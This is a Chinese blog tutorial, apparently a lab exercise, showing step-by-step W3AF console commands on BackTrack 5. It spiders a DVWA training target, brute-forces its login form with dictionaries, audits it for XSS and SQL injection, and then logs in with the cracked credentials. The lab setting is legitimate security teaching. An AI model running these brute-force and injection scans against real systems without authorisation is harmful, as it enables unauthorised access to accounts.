Bt5渗透工具W3AF的使用

版权声明:转载原创文章请以超链接形式请注明原文章出处,尊重作者,尊重原创!


恰饭广告




实验之前请先阅读这篇文章:https://www.idaobin.com/explain

任务描述:

使用W3AF工具扫描测试,实现代码清单4-4,4-5效果P156

任务环境说明:

攻击机:BT5
靶机:Web 服务器靶机
攻击机安装服务/工具1:W3AF
攻击机安装服务/工具2:
攻击机安装服务/工具3:
攻击机安装服务/工具4:

实现步骤:

1.    启动W3AF

cd /pentest/web/w3af/
./w3af_console

w3af启动

2.    代码清单4-4和4-5;W3AF的基本配置与使用

plugins
bruteforce
bruteforce formAuthBrute
bruteforce config formAuthBrute
set passwdFile true
set userFile true
back
audit xss,sqli
discovery webSpider
discovery config webSpider
set onlyForward True
back
back
target
set target http://10.10.10.129/dvwa/index.php
back
plugins
output htmlFile
output config htmlFile
set verbose True
set fileName aa.html
start
exit

w3af的使用

参数:
plugins 进入插件模块
bruteforce插件 使用有关远程web的应用程序进行自动爬取登录并强制使用
bruteforce formAuthBrute插件 强制形成身份验证登录(暴力破解表单认证页面)
bruteforce config formAuthBrute 进入配置formAuthBrute模块 凡遇到认证页面都会调用字典进行暴力破解
set passwdFile true 设置调用密码字典
set userFile true 设置调用用户名字典
back 返回上一个模块
audit xss,sqli 配置对SQL的注入和XSS漏洞的扫描
discovery webSpider 启动webSpider插件(webSpider插件用于爬取网站中的每个页面)
discovery config webSpider 对webSpider插件的配置
set onlyForward True 设置爬取域名下的具体某个页面 false为爬取域名下的所有页面
target 进入配置域名或ip地址的模块
set target http://10.10.10.129/dvwa/index.php 设置目标地址
output htmlFile 将扫描结果储存为文件
output config htmlFile 对扫描结果的储存形式进行配置
set verbose True 设置运行时显示详细信息
set fileName aa.html 设置储存文件为aa.html并储存在W3Af的主目录下
start 根据以上配置进行扫描
exit 退出W3AF

3.    将扫描结果的储存文件用浏览器打开
在W3AF的主目录下输入firefox aa.html,火狐浏览器弹出aa.html页面

firefox aa.html

火狐浏览器打开aa.html

打开页面如下

w3af的扫描结果

4.    打开网站dvwa应用的后台登录地址

dvwa应用的后台登录地址

输入扫描结果提供的用户名和密码进行登录后 返回以下提示信息

dvwa的提示信息

原文链接:https://www.idaobin.com/archives/660.html

让我恰个饭吧.ヘ( ̄ω ̄ヘ)

支付宝 ——————- 微信
图片加载中图片加载中



恰饭广告

发表评论

电子邮件地址不会被公开。 必填项已用*标注

60 − 51 =